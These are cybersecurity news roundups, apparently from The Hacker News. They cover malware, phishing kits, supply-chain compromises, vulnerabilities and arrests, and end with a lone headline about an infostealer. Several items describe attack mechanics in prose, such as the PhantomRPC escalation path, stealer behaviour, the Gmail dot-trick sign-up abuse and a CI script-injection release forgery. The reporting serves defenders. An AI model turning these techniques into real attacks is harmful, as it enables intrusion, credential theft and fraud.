CVE-2026-5402, CVE-2026-5403, CVE-2026-5405, CVE-2026-5656 (Wireshark), CVE-2026-42520, CVE-2026-42523, CVE-2026-42524 (Jenkins), CVE-2026-3008 (Notepad++), and CVE-2025-41658, CVE-2025-41659, CVE-2025-41660 (CODESYS). 🎥 Cybersecurity Webinars Learn to Spot Attack Paths Your AppSec Tools Completely Miss → Modern attackers chain tiny flaws across code, pipelines, and cloud into major breaches — while your AppSec tools stay blind. Join this free webinar with Wiz and The Hacker News to uncover the top real-world attack paths and learn exactly how to spot, map, and stop them fast. Practical insights to prioritize real risks and strengthen your entire software lifecycle. How to Match AI Attack Speed with Autonomous Exposure Validation → Struggling with AI attacks moving faster than your team can respond? Join this free webinar from Picus Security & The Hacker News to discover Autonomous Exposure Validation – how to automatically find real risks, test attack paths, and fix them in minutes, not weeks. Practical, no-fluff insights to stay ahead without burnout. Grab your spot now. Learn Latest AI Threats + Practical Ways to Kill Initial Access → Modern attackers are slipping past traditional defenses with AI-powered phishing, encrypted malware, and stealthy “Patient Zero” tactics. Want to stay ahead? Join this free webinar with Zscaler and The Hacker News to uncover the latest threat trends and practical Zero Trust strategies that actually stop initial compromise — before it becomes a full-blown breach. No fluff, just real insights to protect your organization. 📰 Around the Cyber World OpenAI Debuts Advanced Account Security —OpenAI launched Advanced Account Security, a set of opt-in protections for ChatGPT users "designed for people at increased risk of digital attacks, as well as for those who want the strongest account protections available." As part of the new program, the new controls strengthen sign-in protections, tighten account recovery, reduce exposure from compromised sessions, and give users more visibility into account activity. OpenAI has also partnered with Yubico to link two physical security keys, YubiKey C Nano and YubiKey C NFC, to ChatGPT accounts. That said, users can use any other FIDO-compliant security key, or use software-based passkeys for phishing-resistant authentication. Over 8.8K Ransomware Attacks in 2025 —Fortinet said it recorded 7,831 confirmed ransomware victims globally in 2025, skyrocketing from approximately 1,600 identified victims in 2024. "Availability of crime service kits like WormGPT, FraudGPT, and BruteForceAI contributed to this 389% increase year-over-year (YoY)," Fortinet said. "The top three targeted sectors include manufacturing (1,284), business services (824), and retail (682). Geographic concentration includes the U.S. (3,381), Canada (374), and Germany (291)." KidsProtect Android Surveillance Tool Marketed on the Web —A new Android surveillance tool called KidsProtect is being openly advertised on the clear web that gives an operator near-total secret control of a victim’s phone. "It can't be removed without the attacker's permission," Certo said. "From a web-based dashboard, an operator can secretly record calls, stream live audio from the device’s microphone, track GPS location in real time, read SMS messages and notifications from apps including WhatsApp and Viber, log keystrokes, access contacts and photos, and remotely trigger the front and rear cameras." Assessed to be the work of a Greek-speaking developer, it's available on a subscription basis starting from $60, allowing anyone to buy it, rebrand it, and start selling it as their own. New KYCShadow Android Malware Detected —An Android malware masquerading as a bank KYC verification application is being distributed via WhatsApp and primarily targeting users in India. "The application operates as a multi-stage dropper that installs a secondary payload and establishes persistent command-and-control (C2) communication," CYFIRMA said. "It combines native code obfuscation, Firebase-based remote execution, VPN-based traffic manipulation, and WebView-based phishing to systematically harvest sensitive user data." Phishing Campaign Targets Pakistan Orgs —A highly targeted spear-phishing campaign targeting the Punjab Safe Cities Authority and PPIC3 in Pakistan has been found to use legitimate-sounding government infrastructure projects as lures to deliver malware. "The email carried two malicious attachments: a Word document with a VBA macro dropper and a PDF with a fake Adobe Reader lure, both delivering payloads from a BunnyCDN-hosted malicious infrastructure," Joe Security said. "The attack chain establishes persistent remote access by abusing Microsoft's legitimate VS Code tunnel service, with exfiltration notifications sent via a Discord webhook — a sophisticated technique designed to evade network-level detection." Calendly-Themed Phishing Attacks on the Rise —Multiple threat clusters are leveraging Calendly-themed phishing to fingerprint site visitors and steal credentials and other data. "Behind the shared Calendly branding sits a diverse set of phishing kits, including API-driven frameworks, real-time Socket.IO applications, fake CAPTCHA chains, and Telegram-based exfiltration," urlscan said. Fraud Campaigns GovTrapand FEMITBOT Exposed —Threat actors have been observed deploying sophisticated tactics, including fake government portals, SMS phishing, and lookalike domains, to drive financial fraud and credential harvesting as part of an effort called GovTrap. The government impersonation scam mimics official portals with high accuracy, with links to the fake sites distributed via SMS or email. The end goal is to trick users into entering their personal and financial information, or make non-existent payments that are transferred through money mule accounts. The collected payment card details are abused to facilitate fraudulent transactions. Another threat cluster has leveraged FEMITBOT, a malicious infrastructure that abuses Telegram Mini Apps to scale global fraud campaigns and Android malware delivery. "By leveraging Telegram's native features, threat actors create highly convincing fake platforms across crypto, financial services, AI, and streaming sectors," CTM360 said. "Built on a modular, template-driven architecture, FEMITBOT enables rapid deployment, brand impersonation, and campaign optimization using real-time tracking and analytics." New PowerShell Desktop Stealer Spotted —A Pastebin-hosted PowerShell script disguised as "Windows Telemetry Update" comes with capabilities to steal Telegram Desktop session data via Telegram bot API exfiltration. "The script collects host metadata, including username, hostname, and public IP via api.ipify[.]org, then checks for Telegram Desktop and Telegram Desktop Beta tdata directories," Flare said. "If found, it terminates the Telegram process to release file locks, archives session material into 'TEMP\diag.zip,' and uploads the archive to the attacker-controlled operator chat via the Telegram Bot API sendDocument endpoint." Surge in Teams Phishing in 2026 —eSentire said it has observed an increase in Microsoft Teams-based phishing since early 2026, in which threat actors impersonate IT support and help desk personnel to trick users into granting remote access to their devices. "These phishing attacks have often been linked to email bombing, followed by threat actors reaching out to users under the guise of providing assistance to resolve an issue," eSentire said. "The objective of the attack is to trick the user into granting remote access to their device, and once obtained, threat actors will attempt to exfiltrate data and execute additional payloads to establish persistence or deploy ransomware." New KarstoRAT Malware Enables Data Theft —First spotted in early 2026, KarstoRAT is capable of system reconnaissance, audio and webcam monitoring, screenshot capture, key logging, and token theft. It also enables threat actors to download and run additional payloads, which could point to it being used for post-compromise control on infected machines. "KarstoRAT uses a command-and-control (C2) server that has a diverse set of open ports and services, indicating that it has a multi-purpose infrastructure created for C2 communication and payload distribution," LevelBlue said. "Threat actors use a fake Blox Fruits (a popular Roblox game) virtual marketplace as a lure to trick players into downloading malware that will install KarstoRAT into their machines." ClickUp Discloses Email Address Exposure —ClickUp said its client-side feature flag configuration exposed personally identifiable information. This included 893 customer email addresses that were embedded in feature flag targeting rules, along with one flag that improperly referenced a customer’s API token. "The exposure was limited to 893 customer email addresses used in feature flag targeting rules to control which users see specific features during rollouts," it said. "If your email address was among those included in a feature flag configuration, you have been directly contacted." The incident did not expose any other data. Finnish Authorities Arrest Alleged Scattered Spider Member —Finnish authorities arrested 19-year-old Peter Stokes (aka Bouquet), a dual U.S.-Estonian citizen, as he tried to board a flight to Japan. U.S. prosecutors have charged him as a key member of the notorious Scattered Spider hacking group, and he faces multiple counts of wire fraud, conspiracy, and computer intrusion. New Attacks Linked to Versatile Werewolf —The threat actor known as Versatile Werewolf (aka HeartlessSoul) has been linked to campaigns targeting Russian state structures and aviation companies via phishing emails with malicious archive attachments and malvertising campaigns to deliver a JavaScript trojan. The end goal is to obtain confidential data, particularly geospatial information. Alternatively, the threat actor is known to distribute malicious code using the legitimate SourceForge platform through a project called GearUP. Versatile Werewolf is believed to be active since at least September 2025. Some of the attachments have exploded ZDI-CAN-25373 to trigger the infection chain. The malvertising campaign uses fake domains ("battleflight[.]pro") to deliver bogus installers for aviation-related software to launch the same trojan. "The initial infection involves executing PowerShell commands or scripts designed to download a JavaScript loader from C2 servers," Kaspersky said. "This loader, in turn, loads and executes the main JS-RAT and its modules in memory, among which we found tools for data collection and exfiltration, keyloggers, screen capture tools, UAC bypass tools, and other payloads." The company noted that the domain "battleflight[.]pro" resolves to an IP address that also hosts fake domains linked to the GOFFEE APT. "Both groups actively use PowerShell payloads to deliver and execute malicious modules," it added. "GOFFEE also targets the public sector, which suggests the possibility of joint or coordinated campaigns." Cisco Unveils Model Provenance Kit —Cisco unveiled a new open-source tool, named Model Provenance Kit, to help organizations address potential issues associated with the use of third-party AI models. "Much like a DNA test reveals biological origins, the Model Provenance Kit examines both metadata and the actual learned parameters of a model (like a unique genome that comprises a model), to assess whether models share a common origin and identify signs of modification," Cisco said. "This, combined with a constitution that defines provenance linkages, is an important step toward providing evidence-based assurance that the AI you deploy is what it says it is." Abuse of Hugging Face and ClawHub for Malware Delivery —Threat actors are abusing legitimate AI platforms like Hugging Face and ClawHub for malware delivery, once again demonstrating how trust in AI ecosystems are being exploited. Acronis said it identified more than 575 malicious skills across 13 developer accounts that target both Windows and macOS systems with trojans, cryptocurrency miners, and AMOS stealer, a macOS-focused infostealer. "On Hugging Face, attackers leverage repositories to host payloads and act as staging infrastructure within multistep infection chains, distributing malware disguised as legitimate applications," Acronis said. European Authorities Bust Cryptocurrency Fraud Ring —Albanian and Austrian authorities dismantled a cryptocurrency investment fraud ring that caused estimated losses of more than €50 million ($58.5 million) to victims worldwide. The operation, which took place over two years, resulted in the arrest of ten individuals, the search of multiple premises, and the seizure of 891,735 in cash, 443 computers, 238 mobile phones, six laptops, and multiple storage devices. "The criminal network, allegedly operating several call centres in Tirana, Albania, is believed to have caused significant financial damage, totalling at least €50 million," Europol said. "The call centres were professionally set up and organized, resembling legitimate business structures featuring a clear division of roles and hierarchical management." The criminal network is estimated to have involved up to 450 employees across various departments. The scheme involved luring victims to seemingly legitimate online investment platforms through deceptive advertisements on social media or web searches, and coaxing them into making investments under the promise of huge returns. Victims were then assigned retention agents, who masqueraded as investment advisors and used remote access software to gain full control of their devices. "The fraudsters feigned professional expertise and employed psychological pressure to persuade victims to make additional investments, falsely claiming they would be profitable," Europol said. "In truth, the funds were never invested but were instead channelled into an intricate international money-laundering scheme, ultimately disappearing into the hands of the criminal organisation." In some cases, the fraudsters reached out to the victims again and offered help with recovering their stolen funds, only to demand a €500 entry fee and defraud them a second time. Flaws in EnOcean's SmartServer —Two security flaws have been disclosed in EnOcean's SmartServer IoT platform that affect version 4.60.009 and prior. According to Claroty: "CVE-2026-20761 allows remote attackers to send malicious, crafted LON IP-852 messages that result in arbitrary command execution on devices. CVE-2026-22885 allows remote attackers to send malicious, crafted IP-852 messages that bypass ASLR memory protections and leak memory." Successful exploitation of the flaws results in attackers obtaining control over building management and building automation systems running affected versions of this platform and legacy i.LON devices. Patches have been released for both vulnerabilities. Google Announces Android Credential Manager Update —Google has announced a new update to Android's Credential Manager that allows apps to automatically verify a user's personal Gmail address without requiring one-time passwords (OTPs) or email verification links. "Google now issues a cryptographically verified email credential directly to Android devices," the company said. "For users, this completely removes the need to manually verify their email through external channels. For developers, the API securely delivers these verified user claims for any scenario, whether you are building an account creation flow, a recovery process, or a high-risk step-up authentication." Nearly 8.8K Secrets Leaked Online —According to Truffle Security, 8,792 verified, unique secrets have been leaked online through web-based development environments. The tokens were found across 22 million public projects hosted on Cloud Development Environments (CDEs) such as CodePen, CodeSandbox, JSFiddle, and StackBlitz. Is There More to the Xygeni Compromise? —Multiple connections have been found between the compromise of the Xygeni vulnerability scanner on GitHub and a proxy botnet of hacked ASUS and TP-Link routers. Some of the TP-Link consumer routers have been compromised with Microsocks to unroll them to a residential proxy network. "These routers were also running a custom command-and-control beacon that was named ShadowLink," Ctrl-Alt-Intel said. "When we analysed the ShadowLink protocol, we found it was identical, down to a shared authentication secret, to the backdoor planted in the Xygeni GitHub Action used for that supply chain attack." Brazilian Anti-DDoS Firm Behind DDoS Attacks on ISPs —Huge Networks, a Brazilian tech company that specializes in protecting networks from distributed denial-of-service (DDoS) attacks, has been enabling a botnet responsible for massive DDoS attacks against other internet service providers (ISPs) in the country, according to KrebsOnSecurity. The company has since said the malicious activity resulted from an intrusion first detected in January 2026 and claimed it was likely the work of a competitor. Canonical Target of Sustained DDoS Attack —Canonical disclosed its web infrastructure came under a "sustained, cross-border attack," knocking Ubuntu servers offline for several hours. A pro-Iranian hacktivist group known as the Islamic Cyber Resistance in Iraq, aka 313 Team, claimed responsibility for the attack on Telegram. The websites have since become operational. Last month, the group also disrupted access to the decentralized social media platform Bluesky. New Phishing Kit Bluekit Detailed —A new phishing kit named Bluekit is offering more than 40 templates targeting popular services and includes basic artificial intelligence (AI)-powered features for generating campaign drafts. Available templates can be used to target email accounts (Outlook, Hotmail, Gmail, Yahoo, ProtonMail), cloud and enterprise services (iCloud and Zoho), developer platforms (GitHub), and cryptocurrency services (Ledger). What makes the kit stand out is the presence of an AI Assistant panel that supports multiple models, including Llama, GPT-4.1, Claude, Gemini, and DeepSeek, to help criminals draft phishing emails. It also has support for two-factor authentication, geolocation emulation, antibot cloaking, notifications, spoofing capabilities, voice cloning, and a mail sender. The development once again reinforces the broader trend of crimeware services integrating AI to streamline and scale their operations. Bluekit is the second kit to integrate AI features in as many months. In April 2026, Abnormal Security shed light on a cybercrime platform called ATHR that uses AI vishing agents, credential harvesting panels, and built-in phishing mailers to execute and scale telephone-oriented attack delivery (TOAD) attacks. North Korea Calls U.S. Cyber Threat Claims a Fabrication — North Korea's foreign ministry rejected U.S. accusations that the country poses a cyber threat, stating the U.S. was spreading false information about a non-existent cyber threat from North Korea for political purposes, per Reuters. The ministry said it "would actively take all necessary measures for defending the interests of the state and protecting the rights and interests of its citizens in cyberspace." 🔧 Cybersecurity Tools Model Provenance Kit → It is a free open-source Python tool from Cisco AI Defense that helps identify if a machine learning model is based on a known base model (like Llama, Mistral, GPT, etc.). It analyzes architecture, tokenizer, and weights to quickly compare two models or check against a database of ~150 popular base models. AutoFyn → It is an open-source tool from SignalPilot Labs that runs Claude AI in self-improving loops to optimize measurable goals. Give it a GitHub repo, a clear task (like security hardening, bug fixing, or performance optimization), and a time budget — it works in sandboxed rounds, tracks progress with real evaluations, learns from failures, and delivers improved code via PRs. Disclaimer: This is strictly for research and learning. It hasn't been through a formal security audit, so don't just blindly drop it into production. Read the code, break it in a sandbox first, and make sure whatever you’re doing stays on the right side of the law. Conclusion Stay sharp out there. The pace of attacks is accelerating, and the margin for delay is shrinking. Patch what you can today, verify your supply chains, tighten SaaS access, and treat every “routine” login or pipeline run as potentially hostile. Small habits now will save major headaches later. Until next Monday. Keep your defenses tight and your eyes open. The threats won’t wait — neither should we. See you in the next recap.
thehackernews.comMay 4, 2026extracted
ThreatsDay Bulletin: SMS Blaster Busts, OpenEMR Flaws, 600K Roblox Hacks and 25 More Stories
The internet is noisy this week. We are seeing some wild new tactics, like people using fake cell towers to send scam texts, while some developers are accidentally downloading tools that peek into their private files during a simple install. It is definitely a busy time to be online. Security is always a moving target. Millions of servers are currently sitting online without any passwords, and old software bugs are showing up in the most unexpected places. Even with the right fixes available, staying one step ahead is a full-time job for all of us. Data is shifting in strange ways, too. Some browser tools are now legally selling user history for profit, and new kits are making it simpler for almost anyone to launch a campaign. You have to see these latest updates to believe them. Let’s look at the full list... SMS blaster phishing crackdownCanadian authorities have arrested three men for operating an SMS blaster device that masquerades as a cellular tower to send phishing texts to nearby phones. These tools trick devices into connecting to them by emitting signals that mimic a legitimate tower. "An SMS blaster works by mimicking a legitimate cellular tower. When nearby phones connect to it, users receive fraudulent text messages that appear to come from trusted organizations," authorities said. "These messages often prompt recipients to click on links that lead to fake websites designed to capture personal information, including banking credentials and passwords." The three men are facing 44 charges in connection with the crime. About tens of thousands of devices were connected to the blaster over several months, the official said. This is the first time that an SMS blaster has been spotted in the country. npm brandsquat data theftA new supply chain attack has leveraged an npm package impersonating TanStack to ship malicious versions that exfiltrate environment variables from developers’ machines during install. The package, named tanstack, is designed to "silently steal environment variable files, including .env, .env.local, and .env.production, from developers' machines at install time, exfiltrating them to an attacker-controlled endpoint," Socket said. The malicious package is maintained by a user named "sh20raj." Versions 2.0.4 through 2.0.7 are confirmed malicious. Update: In a post shared on X, Shaswat Raj (@SH20RAJ), the developer behind the package, apologized for his actions and claimed he demanded $10,000 from Tanner Linsley, creator of TanStack, as he "thought it was acceptable to ask for a bounty" for returning the name. The developer also stated the malicious code was part of "random testing" for jailbreaking Google Antigravity. Extensions legally sell user dataIn a new analysis, LayerX found that multiple networks of browser extensions collect user data and resell it for profit. Unlike malicious extensions that conceal their behavior by offering some harmless functionality, the identified 80 extensions explicitly inform users in their privacy policy that they collect and sell data of users who install their extensions. "A network of 24 media extensions that are installed on 800,000 users and collect viewing data and demographic information on major streaming platforms such as Netflix, Hulu, Disney+, Amazon Prime Video, HBO, Apple TV, and others," LayerX said. "12 separate ad blockers with a combined install base of over 5.5 million users openly selling user data. Nearly 50 other extensions, with over 100,000 users in aggregate, that collected and resold users’ browsing data." Komari tool weaponized in attacksHuntress has revealed that unknown threat actors used stolen VPN credentials to pivot into a Windows workstation belonging to an unspecified organization via Impacket's smbexec.py, and dropped a SYSTEM-level backdoor using the Komari agent, a Go-based remote-control, monitoring, and management tool. The development marks the first publicly documented case of the tool being abused in a real-world intrusion. It also illustrates how bad actors are increasingly switching to publicly available and legitimate tools to conduct attacks. "Komari is not a telemetry tool that happens to be abusable - it is a bidirectional control channel by design. The agent opens a persistent WebSocket to its server and accepts three server-to-agent event types out of the box: exec (arbitrary command execution via PowerShell / sh), terminal (interactive PTY reverse shell in the operator's browser), and ping (ICMP / TCP / HTTP probing)," Huntress said. "All three are enabled by default." Whereas other tools like Velociraptor and SimpleHelp that have been abused by threat actors typically act as means to an end, Komari gives an operator arbitrary command execution, an interactive PTY reverse shell, and network probing by default, over a TLS-fronted WebSocket. Next-gen phishing kits escalateThreat actors have detailed two new phishing kits named Saiga 2FA and Phoenix System that have been linked to emails and SMS phishing attacks. According to Barracuda, Saiga 2FA goes beyond traditional adversary-in-the-middle (AitM) features by integrating tools like FM Scanner for extracting and analyzing mailbox content. "Saiga 2FA is an example of how phishing kits are evolving into application-level platforms," the company said. "Unlike traditional phishing kits, Saiga integrates infrastructure, automation, and post-compromise capabilities into a unified system, supporting advanced and highly targeted campaigns." Phoenix System, on the other hand, has been tied to over 2,500 phishing domains since January 2025, while relying on IP-based filtering and geofencing for precision targeting. It's assessed to be the successor to the now-defunct Mouse System. "The campaigns are delivered via SMS, potentially leveraging fake Base Transceiver Stations (BTS) to bypass carrier-level filtering and allow threat actors to send messages that appear under the brand names of trusted organizations directly to victims," Group-IB said. "The campaign has so far targeted more than 70 organizations across the financial services, telecommunications, and logistics sectors globally." Mass exposure of remote access serversA new analysis from Forescout has found 1.8 million RDP and 1.6 million VNC servers are exposed on the internet. "China accounts for 22% of exposed RDP and 70% of exposed VNC servers; the U.S. accounts for 20% and 7%; Germany accounts for 8% and 2%," the company said. "Of 91,000 RDP and 29,000 VNC servers mapped to specific industries, retail, services, and education lead RDP exposure; education, services, and healthcare lead VNC." What's more, 18% of exposed RDP servers run end-of-life Windows versions, more than 19,000 RDP servers remain vulnerable to BlueKeep (CVE-2019-0708), and nearly 60,000 VNC servers have authentication disabled. To make matters worse, more than 670 exposed VNC servers have authentication disabled and provide direct access to OT/ICS control panels. China-linked influence op faltersA China-linked online influence campaign attempted to undermine April 26 elections for the Tibetan parliament-in-exile with little impact. The operation, part of Spamouflage, a long-running influence network linked to Beijing, has used a cluster of 90 Facebook profiles and 13 Instagram profiles to push criticism of the Tibetan government-in-exile and its leadership. "The network tries to drive wedges within the community," DFRLab said. "The goal is to erode trust in the exile government, weaken its international voice, and raise doubts about whether it can credibly represent Tibetans without the Dalai Lama. However, virtually none of these posts seem to have attracted any organic engagement, possibly because all the identified assets are regular Facebook profiles with limited reach and not established pages." Unpatched RPC privilege escalationAn unpatched vulnerability can allow for local privilege escalation in Windows systems through the abuse of the Remote Procedure Call (RPC) architecture in the operating system. Called PhantomRPC, the flaw stems from an architectural weakness in how RPC handles connections to unavailable services. To exploit the flaw, an attacker with limited local access needs to first compromise a privileged service that runs under the Network Service identity, deploy a fake RPC server with the same RPC interface UUID and exposed endpoint name (i.e., TermService), listen to specific requests, and then impersonate the targeted service to escalate their privileges to SYSTEM. Kaspersky, which identified the weakness, said it discovered four PhantomRPC exploitation paths that could lead to privilege escalation. Following responsible disclosure in September 2025, Microsoft opted to not address the issue as it requires an attacker to first compromise the machine through some other means. Vidar dominates infostealer marketThe information stealer known as Vidar (now in its second iteration called Vidar Stealer 2.0) has vaulted to the top of the infostealer market since November 2025 in the aftermath of law enforcement takedowns of Lumma and Rhadamanthys. "Vidar profited from the generated chaos to rise to the top of the stealer ecosystem," Intrinsec said. "We assess that this rise was made available due to the release of version 2.0 of the malware, and to the collaboration with 'Cloud' Telegram channels." It's advertised by a user named "Loadbaks" on underground forums. Recent campaigns have been observed distributing malware that has used bogus links shared via YouTube videos promoting fake software to direct users to Mediafire pages, which are used to deliver executables responsible for downloading and running the broad-spectrum credential harvester. The stolen credentials are then quickly monetized on underground marketplaces like Russian Market. Critical flaws hit healthcare platformThirty-eight critical security vulnerabilities have been disclosed in OpenEMR, the world's most widely used open-source electronic medical records platform. The vulnerabilities, now patched, range in severity from medium to critical and include missing or incorrect authorization checks, cross-site scripting (XSS), SQL injection, path traversal, and insufficient session expiration. These issues, which include two designated critical (CVE-2026-24908 and CVE-2026-23627), could have been exploited to access and tamper with patient and provider data, posing a serious health and regulatory risk to individuals and institutions. "In the most severe cases, SQL injection vulnerabilities combined with modest database privileges could have led to full database compromise, PHI exfiltration at scale, and remote code execution on the server," AISLE said. OpenEMR is used by more than 100,000 medical providers, serving more than 200 million patients in 34 languages. Swiss crackdown on Black AxeA coordinated police operation in Switzerland has led to the arrest of 10 suspected members of the Black Axe criminal network, including the Black Axe "Regional Head" for the Southern European region. Most of those arrested are reported to be of Nigerian origin. The suspects are accused of numerous crimes, including romance scams, cyber fraud offences causing millions of Swiss francs in damages, and money laundering. "The criminal network is known for its involvement in a wide range of criminal activities, including cyber-enabled fraud, drug trafficking, human trafficking and prostitution, kidnapping, armed robbery, and fraudulent spiritual practices," Europol said. PyPI package hijacked via CI exploitIn yet another software supply chain attack, unknown threat actors pushed a malicious version of the popular "elementary-data" package on the Python Package Index (PyPI) to steal sensitive developer data and cryptocurrency wallets. According to StepSecurity, elementary-data version 0.23.3 was uploaded to PyPI on April 24, 2026, at 10:20 p.m. UTC. The attacker opened a pull request with malicious code and exploited a script-injection vulnerability in one of its GitHub Actions workflows to publish it as release 0.23.3. Specifically, it came embedded with a "elementary.pth" file that enabled the theft of developer credentials and secrets. "The attacker exploited a script injection vulnerability in one of the project's own GitHub Actions workflows, then used the workflow's GITHUB_TOKEN to forge a signed release commit and dispatch the legitimate publishing pipeline against it – without ever touching the master branch or opening a pull request," the company said. The developers urged users who installed 0.23.3, or pulled and ran its Docker image, to assume compromise and rotate any credentials. $230M crypto laundering sentence22-year-old Evan Tangeman of Newport Beach, California, was sentenced to 70 months in prison for laundering funds stolen in a massive $230 million cryptocurrency heist as part of an elaborate social engineering scheme. "This criminal enterprise was built on greed so brazen it borders on the cartoonish. They stole millions, spent it on half-million-dollar nightclub tabs, Lamborghinis, and Rolexes," said U.S. Attorney Jeanine Ferris Pirro. "But Evan Tangeman didn't just launder the money that fueled that lifestyle. When his co-conspirators were arrested, he moved to destroy the evidence. That is consciousness of guilt, and this office and the court have treated that accordingly." Tangeman pleaded guilty in December 2025. The criminal enterprise began no later than October 2023 and continued through at least May 2025. Legacy TLS finally deprecatedMicrosoft has announced plans to start blocking legacy TLS connections for POP and IMAP email clients in Exchange Online starting in July 2026. "We're planning to fully deprecate support for legacy TLS versions (TLS 1.0 and TLS 1.1) for POP3 and IMAP4 connections to Exchange Online. These older TLS versions have been industry-deprecated for some time and are no longer considered secure," the company said. "Several years ago, we started the move to block these older versions, but we did allow you to use them by opting in; we're now removing support for them entirely. Our expectation is that only customers who have explicitly opted into using those legacy endpoints are impacted by the deprecation." Phishing via account flow abuseThreat actors are abusing online trading platform Robinhood's account creation process to send phishing emails that bypass spam filters. The emails, which originate from "noreply@robinhood[.]com," warn of suspicious activity tied to their accounts and urge them to click to complete a security check by clicking on a link that directs to a phishing site. "This phishing attempt was made possible by an abuse of the account creation flow," Robinhood said in an X post. "It was not a breach of our systems or customer accounts, and personal information and funds were not impacted. If you received this email, please delete it and do not click any suspicious links. If you have clicked a suspicious link or have any questions about your account, please contact us directly within the Robinhood app or website." Reports on Reddit indicate that the attackers created new Robinhood accounts using modified versions of existing Gmail addresses via the so-called "dot trick." The technique takes advantage of the fact that Gmail ignores periods inserted into or removed from a username, whereas Robinhood treats each variation as a distinct user, allowing the attackers to create a new account that points to an existing account. Social media scams surgeThe U.S. Federal Trade Commission (FTC) warned of a massive increase in losses from social media scams since 2020, exceeding $2.1 billion in 2025, including $794 million to scams that started on Facebook, more than on any other platform. "In 2025, nearly 30% of people who reported losing money to a scam said that it started on social media, with reported losses reaching a staggering $2.1 billion. Social media scams produced far more in losses – an eightfold increase since 2020 – than any other contact method used by scammers to reach consumers," the FTC said. "Social media creates easy access to billions of people from anywhere in the world, making a scammer's job easier at very little cost. Scammers may hack a user's account, exploit what a user posts to figure out how to target them, or buy ads and use the same tools used by real businesses to target people by age, interests, or shopping habits." Billions of credentials exposedKELA said it tracked 2.86 billion compromised credentials in 2025 globally. These included usernames, passwords, session tokens, cookies found in URL, login and password (ULP) lists, breached email repositories, and cybercrime marketplaces. At least 347 million were originally obtained by infostealers found on around 3.9 million infected machines. arXiv papers leak sensitive dataAn analysis of 2.7 million submissions to the arXiv preprint service -- which also makes available the LaTeX sources and other files used to create them -- has found that they include unnecessary files, expose metadata embedded in files (usernames, email addresses, hardware details, GPS information, software versions), and leak irrelevant content in files such as source code comments. This includes backups, hidden .nfs files, Git repositories (including editing histories), andconfiguration files containing API keys. "Apart from unused template files that put unnecessary storage burden on arXiv, we further discovered scripts, research data, and even entire Git repositories. Additionally, comments in LaTeX sources reveal, e.g., author conversations or todo items – for some of those comments, we are certain that the authors did not intend to disclose them publicly. Alarmingly, our findings also include URLs without any access restrictions to other resources (e.g., Google Docs), security tokens, and private keys," the study said. While arXiv recommends Google's arxiv_latex_cleaner to clean the LaTeX code, the researchers have released a tool called ALC-NG to comprehensively remove files, metadata, and comments that are not needed to compile a LaTeX paper. Roblox account hacking ring bustedThe Ukrainian police have arrested three individuals who hacked more than 610,000 Roblox gaming accounts and sold them for a profit of $225,000 on Russian websites. The suspects face up to 15 years in prison if convicted and have been placed in pretrial detention while the investigation is in progress. The scheme was allegedly masterminded by a 19-year-old resident of Drohobych, Lviv Oblast, who met his accomplices, aged 21 and 22, on gaming forums last year. From October 2025 to January 2026, the suspects are believed to have accessed more than 600,000 Roblox user accounts. Iran-linked group targets troopsThe Iran-linked threat actor Handala Hack has targeted U.S. troops in Bahrain in an influence campaign carried out via WhatsApp, according to Stars and Stripes. The messages, signed Handala and containing a link to the group’s website, claimed the service members were under surveillance and soon to be targeted with drones and missiles. "Your identities are fully known to our missile units, and every move you make is under our surveillance. Very soon, you will be targeted by our Shahed drones and Kheibar and Ghadeer missiles," the message sent on April 28, 2026, read. Record surge in privacy finesU.S. states issued $3.45 billion in privacy-related fines to companies in 2025, a total larger than the last five years combined, per Gartner. "Regulators are also shifting their efforts away from spreading awareness to full-scale enforcement," the company said. "This is increasingly becoming the standard in 2026 and beyond." WordPress plugin backdoor uncoveredAnchor Hosting has revealed that a WordPress plugin named Quick Page/Post Redirect plugin, which has over 70,000 installs, was compromised with a backdoor that enables injecting arbitrary code into users' sites. Plugin versions 5.2.1 and 5.2.2, released between 2020 and 2021, have been found to include a covert self-update mechanism that reaches out to a third-party domain, anadnet[.]com, to facilitate the execution of arbitrary code. It's worth noting that the passive backdoor triggers only for logged-out users to hide its activity from site administrators. As of April 16, the plugin has been closed temporarily pending a full review. Qinglong flaws abused for miningHackers are exploiting two authentication bypass vulnerabilities in Qinglong, an open-source timed task management platform with over 19,500 GitHub stars, to deploy cryptocurrency miners. The two flaws – CVE-2026-3965 and CVE-2026-4047 – enable authentication bypass that results in remote code execution. "While these vulnerabilities were formally reported on February 27, exploitation had already been underway for weeks," Snyk said. "Starting around February 7-8, 2026, Qinglong users began opening issues about a hidden process called .fullgc consuming 85-100% of their CPU. The .fullgc filename may have been chosen to blend in with legitimate processes. In Java/JVM environments, 'Full GC' (Full Garbage Collection) is a known source of CPU spikes, which could delay an administrator's investigation." The issues have since been addressed in #PR 2941. Trivy hack enabled repo breachIn a new update shared this week, Checkmarx said its investigation into the cybersecurity incident has revealed the TeamPCP attack affecting the Trivy scanner is the "likely vector that enabled the attackers to obtain credentials and to gain unauthorized access to our GitHub repositories." This, in turn, allowed the attackers to interact with Checkmarx's GitHub environment and publish malicious code to certain artifacts. The development comes as the company acknowledged that data stolen from the GitHub repository was published on the dark web by a cybercrime group known as LAPSUS$. npm stealer tied to DPRK groupThe North Korean threat actor known as Famous Chollima has been attributed to the npm package named js-logger-pack that comes embedded with a WebSocket stealer that's triggered via a postinstall hook. "The payload is a long-running WebSocket agent that: installs the attacker's RSA key into ~/.ssh/authorized_keys on Linux; exfiltrates Telegram Desktop tdata sessions; drains credentials from 27 crypto wallets and Chromium-family browsers; steals .npmrc, cloud provider tokens, and shell history; and runs a native keylogger on Windows, macOS, and Linux with autostart persistence on all three," SafeDep said. Security is a team sport. We keep seeing the same gaps because we focus on the new shiny toys while the basics, like simple passwords and old software versions, fall through the cracks. It is clear that just having a patch isn't enough if nobody actually installs it. The best lesson here is to stay curious and cautious. Whether it is a weird text from a "trusted" source or a new tool that seems too good to be true, taking a second to verify can save a lot of trouble later. Let's keep learning and stay sharp until the next update!
thehackernews.comApr 30, 2026extracted
Arkanix Stealer: a C++ & Python infostealer
